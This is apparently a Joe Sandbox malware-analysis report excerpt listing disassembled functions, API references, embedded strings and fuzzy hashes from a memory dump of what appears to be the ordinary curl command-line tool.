Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_strnequal
String ID: AUTH
API String ID: 482932555-3461045741
Opcode ID: a532403b841036d8354f68221f5110db45488adb511c46192468dd26fa7e014e
Instruction ID: 4fc003f2b1efcc172260b97e6e6a932521556f5680b902909666efcb933216ef
Opcode Fuzzy Hash: a532403b841036d8354f68221f5110db45488adb511c46192468dd26fa7e014e
Instruction Fuzzy Hash: C921A6B0508356AACB209F258400367FBE16F69358F18590FF9D94B382EB7DD9068B5E

Function 00436189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

curl_strnequal.CURL ref: 004361B1
curl_strnequal.CURL ref: 004361ED
curl_strnequal.CURL ref: 00436255

Strings

AUTH, xrefs: 004361A6, 004361E2

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_strnequal
String ID: AUTH
API String ID: 482932555-3461045741
Opcode ID: 1954d1d14e136751dae3c356666020906c15ad1c2344246b2e25aaea02d56025
Instruction ID: 9eff6e6c3ab48c5d908f8cf2fdd795e6c26ad52633b93c08c84da32662db9794
Opcode Fuzzy Hash: 1954d1d14e136751dae3c356666020906c15ad1c2344246b2e25aaea02d56025
Instruction Fuzzy Hash: A721F4B04087036ACB10AF25854036BBBD1AF48344F16D94EEDD88B386E77CD906CB4E

Function 00423380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 004233CA

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

memcpy.MSVCRT ref: 0042341F

Strings

%d.%d.%d.%d, xrefs: 004233B3

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintfcurl_mvsnprintfmemcpy
String ID: %d.%d.%d.%d
API String ID: 3584928937-3491811756
Opcode ID: 0265526e7be7b79f78ce6aef8f919431905d5aae43473ff7b1880c2d6916e1be
Instruction ID: 6f71f2b8dcbe53351fd271ec78912f84ee614af95adb1ea6855955d8e61274f9
Opcode Fuzzy Hash: 0265526e7be7b79f78ce6aef8f919431905d5aae43473ff7b1880c2d6916e1be
Instruction Fuzzy Hash: 09218975A087248AC704DF6AD48459AFBF4EF88315F09856EE8D8A3311E67899488B91

Function 00438489 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

curl_strnequal.CURL ref: 004384B1
curl_strnequal.CURL ref: 004384ED
curl_strnequal.CURL ref: 00438555

Strings

AUTH, xrefs: 004384A6, 004384E2

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_strnequal
String ID: AUTH
API String ID: 482932555-3461045741
Opcode ID: 04241cb9bdc9cdd27502b4d9e38ba4d2e6a388d863e56608ced56eced8ead156
Instruction ID: 6c910abd00fbebc0f38bd22021878e0efcab4d5419d8d3a78bae60a89dd57e5a
Opcode Fuzzy Hash: 04241cb9bdc9cdd27502b4d9e38ba4d2e6a388d863e56608ced56eced8ead156
Instruction Fuzzy Hash: 912192B0508746AACB20DF258000367FBE16F68354F18590FFAD98B381EB7DD9058B4E

Function 00434F90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 00435015

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

curl_maprintf.CURL ref: 0043502D

Part of subcall function 00444670: curl_maprintf.CURL(?,?,?,?,?,?,?,?,?,?,?,00000002,74D656E0,?,004447DF), ref: 0044468D
Part of subcall function 00444670: curl_mvaprintf.CURL(?,?,?,?,?,?,?,?,?,?,?,00000002,74D656E0,?,004447DF), ref: 004446A7
Part of subcall function 00444670: strlen.MSVCRT ref: 004446CA

Strings

%s %s, xrefs: 00435022
%c%03d, xrefs: 00434FFB

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintf$curl_msnprintfcurl_mvaprintfcurl_mvsnprintfstrlen
String ID: %c%03d$%s %s
API String ID: 63324820-883683383
Opcode ID: b7a6931b94479587d7d3ab025d6e304f68905a6b9274df2c9a19bf01d3fa8acd
Instruction ID: 20e345c75f510d07f3e9c21ed461d074c645034f7d46c00cf4999fae3da7c238
Opcode Fuzzy Hash: b7a6931b94479587d7d3ab025d6e304f68905a6b9274df2c9a19bf01d3fa8acd
Instruction Fuzzy Hash: 34215CB2B087018BC3189F6EC9C565BFBE5BB88304F45893EF588C7355D7B899448B46

Function 00404C8F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

time.MSVCRT ref: 00404CC9
curl_getdate.CURL ref: 00404CE4

Part of subcall function 004130D0: isalpha.MSVCRT ref: 00413155
Part of subcall function 004130D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00422537), ref: 0041317E
Part of subcall function 004130D0: strtol.MSVCRT ref: 004131AE
Part of subcall function 004130D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004131B5

_stati64.MSVCRT ref: 00404D0A

Strings

Illegal date format for -z, --timecond (and not a file name). Disabling time condition. See curl_getdate(3) for valid date syntax., xrefs: 0040648D

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLast$_stati64curl_getdateisalphastrtoltime
String ID: Illegal date format for -z, --timecond (and not a file name). Disabling time condition. See curl_getdate(3) for valid date syntax.
API String ID: 3081117663-20515511
Opcode ID: 8122ede0a77391333658fc0fd7fea124b5f1d781071c2e449f2b8e9b3754cc47
Instruction ID: b19d5b2c48aab8b9fac7fe8904897725f18fe3fede849b7d6cc2cb95a1f2c903
Opcode Fuzzy Hash: 8122ede0a77391333658fc0fd7fea124b5f1d781071c2e449f2b8e9b3754cc47
Instruction Fuzzy Hash: 1421FFB45083408FC770DF25C58839B7BE1AFD6314F144A6EE9D89B2E5D37899858B07

Function 0040D060 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

curl_easy_setopt.CURL ref: 0040D08A

Strings

curl_easy_setopt(hnd, %s, (long)%s);, xrefs: 0040D0C6
pQG, xrefs: 0040D0CE
curl_easy_setopt(hnd, %s, %ldL);, xrefs: 0040D0F8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_easy_setopt
String ID: curl_easy_setopt(hnd, %s, %ldL);$curl_easy_setopt(hnd, %s, (long)%s);$pQG
API String ID: 2879491745-3009636540
Opcode ID: 792747cb3f3b82f151aa23003c48d823935177a7f06711eaf1b1a2d1ae3b0ba3
Instruction ID: 562c0b9f837604e289275f5be6501f69a5e8a89e160526afc850d0e185d7d022
Opcode Fuzzy Hash: 792747cb3f3b82f151aa23003c48d823935177a7f06711eaf1b1a2d1ae3b0ba3
Instruction Fuzzy Hash: 82119E7590A300ABC790DF59D48011BBBE8EF85758F94982FF8889B301E3B5D805CB97

Function 00404532 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 00404544
free.MSVCRT ref: 00404568
_strdup.MSVCRT ref: 0040458D

Strings

;auto, xrefs: 00404539

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _strdupfreestrstr
String ID: ;auto
API String ID: 408984727-1462600812
Opcode ID: f65c393d4d5edb3333bb83e7806abe0143b766ec7f1344f4a5155eea0bd769c0
Instruction ID: e204f044a144287bb13ac20ac7737a7021b94c71fb939a6858c582560b907042
Opcode Fuzzy Hash: f65c393d4d5edb3333bb83e7806abe0143b766ec7f1344f4a5155eea0bd769c0
Instruction Fuzzy Hash: 091128B06083809BDB309F25C98476B76E0AFC2308F14096EEA959B392D779D8418B1B

Function 0040558E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 004055A6
_strdup.MSVCRT ref: 004055CE
curl_strequal.CURL ref: 004055EC

Strings

SRP, xrefs: 004055E1

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _strdupcurl_strequalfree
String ID: SRP
API String ID: 2333441763-1918707673
Opcode ID: 64f009d4fe4da3478a7b76d123edac931fbf0934b9c6e28f375aa28c4c27ab74
Instruction ID: 73c1f4bff80b38afb1ef4f4edeb71d71c84b98d700fe71fc6e31c7d371e5afd3
Opcode Fuzzy Hash: 64f009d4fe4da3478a7b76d123edac931fbf0934b9c6e28f375aa28c4c27ab74
Instruction Fuzzy Hash: 4E111FB02087809BD7209F25C84476B77E1AF81354F04496AE985AF3D5E778D8808B0A

Function 00422F5C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00421970: time.MSVCRT ref: 00421986

curl_strequal.CURL(?,?,?,?,?,?,?,00000000,?,?,0041AD83), ref: 00422F75

Part of subcall function 0040EF20: _stricmp.MSVCRT ref: 0040EF32

fwrite.MSVCRT ref: 00422FAD
curl_mfprintf.CURL(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,0041AD83), ref: 00422FFF
fclose.MSVCRT ref: 00423080
fopen.MSVCRT ref: 0042309B

Strings

# Netscape HTTP Cookie File# http://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00422FA6

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _stricmpcurl_mfprintfcurl_strequalfclosefopenfwritetime
String ID: # Netscape HTTP Cookie File# http://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.
API String ID: 642140059-2188823906
Opcode ID: 0b5a8867e71d3867818761de516effa70bb3a4f7b9a3a9690804eb6ccf433807
Instruction ID: 15a32fc217b9db81f41094526b0a32b41ffc6174a9a94960e40a282039f3bb3b
Opcode Fuzzy Hash: 0b5a8867e71d3867818761de516effa70bb3a4f7b9a3a9690804eb6ccf433807
Instruction Fuzzy Hash: 53111CB03043119FD710DF16D28062AB7F0BF91704F45885FE98597316D7B9E885DB5A

Function 0040DD39 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

curl_mfprintf.CURL ref: 0040DDE7
isalpha.MSVCRT ref: 0040DE44
malloc.MSVCRT ref: 0040DF9C
malloc.MSVCRT ref: 0040DFBE
memcpy.MSVCRT ref: 0040DFE9
curl_msnprintf.CURL ref: 0040E17E

Strings

too many globs, xrefs: 0040DD80
curl: (%d) [globbing] %s, xrefs: 0040DDDC
lF, xrefs: 0040DDB5

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: malloc$curl_mfprintfcurl_msnprintfisalphamemcpy
String ID: curl: (%d) [globbing] %s$too many globs$lF
API String ID: 4278650748-1564722762
Opcode ID: d1de27374af01ac1e4050d500f71cc00c72442776306ba2fb8df7b6dadac13cc
Instruction ID: bd96698f7f429f31d0f230a70e90ff3770107e9336c2bc27512dac30ba04d914
Opcode Fuzzy Hash: d1de27374af01ac1e4050d500f71cc00c72442776306ba2fb8df7b6dadac13cc
Instruction Fuzzy Hash: 62014071B043468BDB30AF59D8807AB77A5BF44704F01843FD948AF344E7799845CB9A

Function 00451A99 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00451AD2
WSAGetLastError.WS2_32 ref: 00451AE2

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

Strings

Sending data failed (%d), xrefs: 00451AE8
SENT, xrefs: 00451B01

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastcurl_mvsnprintfsendstrlen
String ID: SENT$Sending data failed (%d)
API String ID: 3573388237-3459338696
Opcode ID: 889cb297c760e9cf182bb0ebafc97b8f41564b7e661ab33d8de437cf67d11a98
Instruction ID: 33430bd9174eaaef43bf03456abc554dfca426d43f998828cb6ad77ac50a1b15
Opcode Fuzzy Hash: 889cb297c760e9cf182bb0ebafc97b8f41564b7e661ab33d8de437cf67d11a98
Instruction Fuzzy Hash: 35014C75904344DFCB00AFA9D48419EBFF4EF89364F00851EE99897351D7349544CB9A

Function 0040A45C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0040BBA0: strstr.MSVCRT ref: 0040BBBA
Part of subcall function 0040BBA0: strrchr.MSVCRT ref: 0040BBD2
Part of subcall function 0040BBA0: strrchr.MSVCRT ref: 0040BBF7
Part of subcall function 0040BBA0: strrchr.MSVCRT ref: 0040BC0D
Part of subcall function 0040BBA0: curl_easy_escape.CURL ref: 0040BC30
Part of subcall function 0040BBA0: curl_maprintf.CURL ref: 0040BC4E
Part of subcall function 0040BBA0: curl_free.CURL ref: 0040BC58
Part of subcall function 0040BBA0: free.MSVCRT ref: 0040BC64

_open.MSVCRT ref: 0040A49C
_fstati64.MSVCRT ref: 0040A4BC

Part of subcall function 00407610: fwrite.MSVCRT ref: 00407641
Part of subcall function 00407610: curl_mvfprintf.CURL ref: 00407651
Part of subcall function 00407610: curl_mfprintf.CURL ref: 00407661

_close.MSVCRT ref: 0040A4F2

Strings

Can't open '%s'!, xrefs: 0040A4D1

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strrchr$_close_fstati64_opencurl_easy_escapecurl_freecurl_maprintfcurl_mfprintfcurl_mvfprintffreefwritestrstr
String ID: Can't open '%s'!
API String ID: 2319957669-663031607
Opcode ID: ab9e856f9274a94dd2f0126cbc39f33ec0e02328dc28aeb67bbb9742fd7456f7
Instruction ID: 1bfc7d4aaf1d6237096a76c7064f5b46c922c44dd6a2ffa54d358017affe7ac8
Opcode Fuzzy Hash: ab9e856f9274a94dd2f0126cbc39f33ec0e02328dc28aeb67bbb9742fd7456f7
Instruction Fuzzy Hash: D2119DB49097409BD760AF69C184B5ABBE0BF88304F408D2EE8C8D7391E778E8458B56

Function 00407169 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 0040711B
ExpandEnvironmentStringsA.KERNEL32 ref: 00407139
_strdup.MSVCRT ref: 0040715C
strchr.MSVCRT ref: 0040718B

Strings

%, xrefs: 00407110

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchr$EnvironmentExpandStrings_strdup
String ID: %
API String ID: 1521587422-2567322570
Opcode ID: df15f956b41656b267c08b566c04c5473c5aefd59ccc324d6abeb8ab64f0d99c
Instruction ID: aac052e1f0fe068902a3ad2284d096d9a8eb43ec650ec39815cd0d10a28ef314
Opcode Fuzzy Hash: df15f956b41656b267c08b566c04c5473c5aefd59ccc324d6abeb8ab64f0d99c
Instruction Fuzzy Hash: 3DF0F672C083108ACB206F64884439EB7E0EF40344F04447EDD896B3D0D778A949C78B

Function 0040DD8C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

curl_mfprintf.CURL ref: 0040DDE7
curl_msnprintf.CURL ref: 0040E17E

Strings

curl: (%d) [globbing] %s, xrefs: 0040DDDC
unmatched close brace/bracket, xrefs: 0040DDA0
lF, xrefs: 0040DDB5

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mfprintfcurl_msnprintf
